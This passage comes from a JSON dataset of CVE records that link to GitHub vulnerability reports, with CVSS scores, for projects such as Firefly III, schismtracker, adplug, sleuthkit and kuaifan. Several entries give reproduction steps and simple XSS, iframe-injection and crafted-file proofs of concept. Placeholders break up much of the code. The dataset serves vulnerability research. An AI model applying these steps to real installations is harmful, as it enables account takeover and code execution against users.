\u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filtering input parameter: Positive or \"whitelist\" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. Special characters include the following: APITAG \" ' % ; ) ( & + APITAG Codefunction APITAG { \u00a0\u00a0\u00a0 APITAG = APITAG PATHTAG \\| PATHTAG (\\|\\) PATHTAG ); \u00a0\u00a0\u00a0 return APITAG } While the issue was investigated, there were some backend updates done which apparently automatically mysteriously fixed the issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-14518",
        "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1042",
        "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1042",
        "Repo_new": "evolution-cms/evolution",
        "Issue_Created_At": "2019-03-22T14:41:23Z",
        "description": "I Frame Injection Vulnerability. I Frame Injection Vulnerability Risk Description Malware Attackers use this APITAG and include the malware websites. They are able to include the webpage one pixel square APITAG won\u2019t able to see it in webpage). Obfuscate the APITAG that will run automatically from that included page so that it looks something like NUMBERTAG C NUMBERTAG D NUMBERTAG F \u2013 leaving no obvious clue that it\u2019s malicious. Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more. POC Login to Evolution CMS application FILETAG Goto the template location and try to create New template FILETAG insert the payload in description location, template name as \"/> APITAG APITAG FILETAG save and close the template. FILETAG Now open the template list like below you will get Iframe which is running malicious. FILETAG Mitigation NUMBERTAG you should include the Content Security Policy frame ancestors header in your HTTP response to prevent your website being loaded in a frame. Some older browsers may not have support for this header, so also use the X Frame Options header with value DENY, SAMEORIGIN or ALLOW FROM uri. X Frame Options takes precedence over CSP frame ancestors in some browsers NUMBERTAG You could additionally have some Javascript \"frame breaker\" code that will prevent your website from being \"framed\" in older browsers. \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Output encoding: It is recommended to implement \u2018output encoding\u2019 to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. Java HTML encoding Function public static String APITAG APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG result = new APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG iterator = new \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 char character =\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 while (character != APITAG ) \u00a0\u00a0\u00a0\u00a0 { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (character == ' APITAG ') APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG NUMBERTAG else if (character == '\\ ) APITAG NUMBERTAG else if (character == '&')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //the char is not a special one \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //add it to the result as is \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 character = APITAG \u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0 return APITAG \u00a0 } \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Escaping: Escape all untrusted data based on the HTML context (body, attribute, APITAG CSS, or URL) that the data will be placed into. EASPI API String safe = APITAG APITAG \"input\" ) ); \u00a0 \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filtering input parameter: Positive or \"whitelist\" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. Special characters include the following: APITAG \" ' % ; ) ( & + APITAG Codefunction APITAG { \u00a0\u00a0\u00a0 APITAG = APITAG PATHTAG \\| PATHTAG (\\|\\) PATHTAG ); \u00a0\u00a0\u00a0 return APITAG }",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-14523",
        "Issue_Url_old": "https://github.com/schismtracker/schismtracker/issues/202",
        "Issue_Url_new": "https://github.com/schismtracker/schismtracker/issues/202",
        "Repo_new": "schismtracker/schismtracker",
        "Issue_Created_At": "2019-08-01T14:40:50Z",
        "description": "Heap Overflow while parsing Amiga Oktalyzer files. Hey schismtracker team, I would like to report a security vulnerability in Amiga Oktalyzer parser (fmt/okt.c). There is a heap overflow in the way the parser handles Song's orderlist in Amiga Oktalyzer file format. The fmt_okt_load_song function, takes the NUMBERTAG bytes long length (plen) of the song orderlist directly from the file. At the end of the function, it try to memser the structure, however the size of the memset is calculated by substracting MAX_ORDERS minus the plen NUMBERTAG As a consequence, if a file is created with a plen bigger than MAX_ORDER NUMBERTAG it will underflow and become a big unsigned integer that will make memset overflow beyond their boundaries. int fmt_okt_load_song(song_t song, slurp_t fp, unsigned int lflags) { int plen NUMBERTAG how many positions in the orderlist are valid while (!slurp_eof(fp)) { uint NUMBERTAG t blklen; // length of this block size_t nextpos; // ... and start of next one slurp_read(fp, tag NUMBERTAG slurp_read(fp, &blklen NUMBERTAG blklen = APITAG nextpos = slurp_tell(fp) + blklen; [...] switch (OKT_BLOCK(tag NUMBERTAG tag NUMBERTAG tag NUMBERTAG tag NUMBERTAG case OKT_BLK_PLEN: if (!(readflags & OKT_HAS_PLEN)) { readflags |= OKT_HAS_PLEN; slurp_read(fp, &w NUMBERTAG plen = APITAG } [...] song >pan_separation NUMBERTAG memset(song >orderlist + plen, ORDER_LAST, MAX_ORDERS plen NUMBERTAG Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14524",
        "Issue_Url_old": "https://github.com/schismtracker/schismtracker/issues/201",
        "Issue_Url_new": "https://github.com/schismtracker/schismtracker/issues/201",
        "Repo_new": "schismtracker/schismtracker",
        "Issue_Created_At": "2019-08-01T14:12:19Z",
        "description": "Heap Overflow on parsing MTM. Hey schismtracker team, I would like to report a security vulnerability in schismtracker MTM parser (fmt/mtm.c). There is a potential heap overflow on the way schismtracker parse MTM files, specifically while working with song patterns. On fmt_mtm_load_song, it takes the number of patterns from the file in line NUMBERTAG npat = slurp_getc(fp); And later in code, there is a loop that fills the song patterns and patterns_sizethat is defined as: define MAX_PATTERNS NUMBERTAG song_note_t patterns[MAX_PATTERNS]; // Patterns uint NUMBERTAG t pattern_size[MAX_PATTERNS]; // Pattern Lengths The loop takes the value of npat directly, this is a one byte long field which maximun size can hold up to NUMBERTAG entries. / patterns / for (pat NUMBERTAG pat APITAG patterns[pat] = APITAG NUMBERTAG song >pattern_size[pat] = song >pattern_alloc_size[pat NUMBERTAG tracknote = trackdata[n]; Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14525",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5753",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5753",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-08-02T02:16:28Z",
        "description": "Fix some sensitive value handling in the server config API/portal UI. The bug A couple of values aren't being correctly handled as sensitive on one of the server configuration APIs/pages. Relates to APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-14525",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5754",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5754",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-08-02T02:34:17Z",
        "description": "Fix some sensitive value handling in the server config API/portal UI. The bug A couple of values aren't being correctly handled as sensitive on one of the server configuration APIs/pages. Relates to APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-14531",
        "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1576",
        "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1576",
        "Repo_new": "sleuthkit/sleuthkit",
        "Issue_Created_At": "2019-07-22T16:53:19Z",
        "description": "Out of Bounds read in ISO NUMBERTAG Dear sleuthkit team, I would like to report a security vulnerability in APITAG There is an out of bound read on iso NUMBERTAG while parsing System Use Sharing Protocol data. On the parse_susp function, while parsing an ER entry, it will try to read the different Extension strings. However, there is no control of the size fields and they will read out of the buf size bound. else if ((head >sig FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14532",
        "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1575",
        "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1575",
        "Repo_new": "sleuthkit/sleuthkit",
        "Issue_Created_At": "2019-07-22T16:28:14Z",
        "description": "Off by One Underflow on hfind. Dear sleuthkit team, I would like to report a security vulnerability in APITAG There is an off by one overwrite due to an underflow on hfind.cpp while using a bogus hash table. On the main function, when a hash table is used, it read the first line and try to remove the newline character, however, if a bogus hash file is used with a NULL as the first character, the fgets will work however when it try to clean the new line using strlen(buf), it will return zero and as a consequence a zero will be written at the position buf NUMBERTAG int main(int argc, char arg NUMBERTAG int ch; TSK_TCHAR idx_type = NULL; TSK_TCHAR db_file = NULL; [..] char buf NUMBERTAG if (NULL == fgets(buf NUMBERTAG handle)) { break; } endif \u00a0 / Remove the newline / buf[strlen(buf NUMBERTAG A simple proof of concept consists of using a hash lookup file with NULL as the first character: $ hfind f boom.hex any.db PATHTAG hexdump /tmp/boom.he NUMBERTAG aa NUMBERTAG aaaa aaaa aaaa aaaa aaaa aaaa aaaa NUMBERTAG aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa NUMBERTAG aaaa aaaa NUMBERTAG aa The exact line could be found here: URLTAG Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14540",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2449",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2449",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-09-10T17:06:52Z",
        "description": "Block one more gadget type (no CVE allocated yet). Similar to other Unbounded Polymorphic Type (default typing, usually) vulnerabilities, a new report that is loosely related to (already blocked) type APITAG has been received. This is a placeholder for now, more details will be added once vulnerability has been evaluated and, if found applicable, fixed.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14540",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2410",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2410",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-08-06T02:03:28Z",
        "description": "Block one more gadget type ( CVETAG ). Hey, buddy. I found a new gadget can be used to exploit jackson which can cause RCE. I had sent the report to EMAILTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14544",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/5764",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/5764",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2019-08-01T11:59:15Z",
        "description": "Incorrect access control. Gogs version (or commit ref): newest(e NUMBERTAG Can you reproduce the bug at FILETAG Yes I discovered a misconfigured access control in the newest gogs, I think it's some kind of bug. Can you confirm u APITAG is still the best email to send more details? Best, Manasseh Zhou MENTIONTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14546",
        "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1369",
        "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1369",
        "Repo_new": "espocrm/espocrm",
        "Issue_Created_At": "2019-07-29T15:31:19Z",
        "description": "Stored XSS to Complete Account Takeover. Hello Team, I found a Stored XSS on an endpoint and with that I'm able to takeover any account possible. Its a bit of a lengthy report, should I write here or mail to some id for privacy. If possible could you set up a meeting so that I explain you the whole process.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-14653",
        "Issue_Url_old": "https://github.com/pandao/editor.md/issues/715",
        "Issue_Url_new": "https://github.com/pandao/editor.md/issues/715",
        "Repo_new": "pandao/editor.md",
        "Issue_Created_At": "2019-08-02T08:05:43Z",
        "description": "XSS vulnerability on APITAG and APITAG .. Summary Because there are no attribute filters in the abbr and sup tags, an attacker can trigger XSS on websites which is using FILETAG . CVE Will be assigned soon. Payloads This will execute APITAG when you move the mouse on any part of the page. CODETAG Images APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14667",
        "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2363",
        "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2363",
        "Repo_new": "firefly-iii/firefly-iii",
        "Issue_Created_At": "2019-08-02T09:26:36Z",
        "description": "Multiple Stored XSS in convert transactions.. Description Current version of Firefly III Version NUMBERTAG is vulnerable to multiple stored XSS due to lack of filtration of user supplied data in transaction description field and in asset account name. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit links below. Steps to reproduce NUMBERTAG Add NUMBERTAG asset accounts with names \" APITAG alert(\"XSS in source asset account\") APITAG \", \" APITAG alert(\"XSS in destination asset account\") APITAG NUMBERTAG Add new transaction with description \" APITAG alert(\"XSS in transaction description\") APITAG \". You can add new deposit or withdrawal or transfer NUMBERTAG isit CODETAG See NUMBERTAG alerts (one description alert, two source account alerts, two destination account alerts). POC image FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14668",
        "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2364",
        "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2364",
        "Repo_new": "firefly-iii/firefly-iii",
        "Issue_Created_At": "2019-08-02T09:40:51Z",
        "description": "Stored XSS in delete link transactions. . Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in transaction description field. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit links below. Steps to reproduce NUMBERTAG Add NUMBERTAG new transactions with description \" APITAG alert(\"XSS in transaction description\"); APITAG \" and \" APITAG alert(\"XSS in transaction description NUMBERTAG APITAG NUMBERTAG Link them together NUMBERTAG isit APITAG You can navigate there from transaction menu. See NUMBERTAG alerts (two first transaction description payloads, two second transaction description payloads) POC Image FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-14669",
        "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2366",
        "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2366",
        "Repo_new": "firefly-iii/firefly-iii",
        "Issue_Created_At": "2019-08-02T10:08:18Z",
        "description": "Stored XSS in reports/audit. . Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in asset account name. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit link below. Steps to reproduce NUMBERTAG Add two assets accounts with names \" APITAG alert(\"account with no activity\"); APITAG \" and \" APITAG alert(\"active account\"); APITAG NUMBERTAG Do some activity with active account NUMBERTAG isit PATHTAG FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-14670",
        "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2365",
        "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2365",
        "Repo_new": "firefly-iii/firefly-iii",
        "Issue_Created_At": "2019-08-02T09:48:29Z",
        "description": "Stored XSS in create from bill rule. . Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in bill name field Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit link below. Steps to reproduce NUMBERTAG Add new bill with name \" APITAG alert(\"XSS in bill rule\") APITAG NUMBERTAG isit PATHTAG FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-14671",
        "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2367",
        "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2367",
        "Repo_new": "firefly-iii/firefly-iii",
        "Issue_Created_At": "2019-08-02T11:30:27Z",
        "description": "Local file enumeration vulnerability. . Bug description Current version of Firefly III Version NUMBERTAG is vulnerable to local files enumeration. Steps to reproduce NUMBERTAG isit APITAG NUMBERTAG Send that request: ERRORTAG You will be redirected to URLTAG where you can see ERRORTAG Send request above again with PATHTAG you will see ERRORTAG NUMBERTAG Error codes are different, and malicious attacker can use it to gain information about local file system, enumerate files and paths, bruteforce file structure. That issue appeared because you use libcurl, without proper protocol sanitizing.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14672",
        "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2370",
        "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2370",
        "Repo_new": "firefly-iii/firefly-iii",
        "Issue_Created_At": "2019-08-02T20:56:28Z",
        "description": "Stored XSS in liability error.. Bug description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in liability name field. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit link below. Steps to reproduce NUMBERTAG Set a new liability account with name \" APITAG alert(\"XSS in liability error\") APITAG \" , also set APITAG amount of debt\" to NUMBERTAG start date of debt\" to any date, \"interest\" to NUMBERTAG Save it. FILETAG NUMBERTAG Go to PATHTAG FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-14690",
        "Issue_Url_old": "https://github.com/adplug/adplug/issues/85",
        "Issue_Url_new": "https://github.com/adplug/adplug/issues/85",
        "Repo_new": "adplug/adplug",
        "Issue_Created_At": "2019-08-06T09:54:44Z",
        "description": "Heap based buffer overflow in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in src/bmf.cpp L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14691",
        "Issue_Url_old": "https://github.com/adplug/adplug/issues/86",
        "Issue_Url_new": "https://github.com/adplug/adplug/issues/86",
        "Repo_new": "adplug/adplug",
        "Issue_Created_At": "2019-08-06T09:55:10Z",
        "description": "Heap based buffer overflow in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in src/dtm.cpp L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14692",
        "Issue_Url_old": "https://github.com/adplug/adplug/issues/87",
        "Issue_Url_new": "https://github.com/adplug/adplug/issues/87",
        "Repo_new": "adplug/adplug",
        "Issue_Created_At": "2019-08-06T09:55:15Z",
        "description": "Heap based buffer overflow in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in src/mkj.cpp L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14731",
        "Issue_Url_old": "https://github.com/easysoft/zentaopms/issues/35",
        "Issue_Url_new": "https://github.com/easysoft/zentaopms/issues/35",
        "Repo_new": "easysoft/zentaopms",
        "Issue_Created_At": "2019-08-05T14:59:11Z",
        "description": "There is one XSS(stored) vulnerability that can get Cookies from other account. There exists XSS(stored) vulnerability in Rich Text Box. The vulnerability replication process is as follows NUMBERTAG Capture packets when you add picture through Rich Text Bo NUMBERTAG Then, change raw data into ERRORTAG NUMBERTAG After successful saving\uff0cusers' cookies will pop up.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-14732",
        "Issue_Url_old": "https://github.com/adplug/adplug/issues/88",
        "Issue_Url_new": "https://github.com/adplug/adplug/issues/88",
        "Repo_new": "adplug/adplug",
        "Issue_Created_At": "2019-08-06T11:11:24Z",
        "description": "Multiple heap based buffer overflows in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found multiple heap based buffer overflows in APITAG in src/a2m.cpp L NUMBERTAG and L NUMBERTAG Attaching reproducers for both issues (gzipped so APITAG accepts them): FILETAG FILETAG ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14733",
        "Issue_Url_old": "https://github.com/adplug/adplug/issues/89",
        "Issue_Url_new": "https://github.com/adplug/adplug/issues/89",
        "Repo_new": "adplug/adplug",
        "Issue_Created_At": "2019-08-06T11:58:03Z",
        "description": "Multiple heap based buffer overflows in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found multiple heap based buffer overflows in APITAG in src/rad.cpp L NUMBERTAG and L NUMBERTAG Attaching reproducers for both issues (gzipped so APITAG accepts them): FILETAG FILETAG ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14734",
        "Issue_Url_old": "https://github.com/adplug/adplug/issues/90",
        "Issue_Url_new": "https://github.com/adplug/adplug/issues/90",
        "Repo_new": "adplug/adplug",
        "Issue_Created_At": "2019-08-06T12:40:29Z",
        "description": "Multiple heap based buffer overflows in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found multiple heap based buffer overflows in APITAG in src/mtk.cpp L NUMBERTAG and L NUMBERTAG Attaching reproducers for both issues (gzipped so APITAG accepts them): FILETAG FILETAG ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14746",
        "Issue_Url_old": "https://github.com/poropro/kuaifan/issues/2",
        "Issue_Url_new": "https://github.com/poropro/kuaifan/issues/2",
        "Repo_new": "poropro/kuaifan",
        "Issue_Created_At": "2019-07-24T08:40:24Z",
        "description": "Insert malicious code in the installation process to get a web shell. PATHTAG NUMBERTAG CODETAG it's easy to find that when we write db's config into FILETAG ,we didn't do any filtering. What's more,we use the APITAG ,so we can control all variables in this page. and this is the payload: FILETAG we can see the caches/config.php FILETAG we visit that page FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14747",
        "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/47",
        "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/47",
        "Repo_new": "wkeyuan/dwsurvey",
        "Issue_Created_At": "2019-08-07T04:26:10Z",
        "description": "FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14809",
        "Issue_Url_old": "https://github.com/golang/go/issues/29098",
        "Issue_Url_new": "https://github.com/golang/go/issues/29098",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2018-12-04T17:21:41Z",
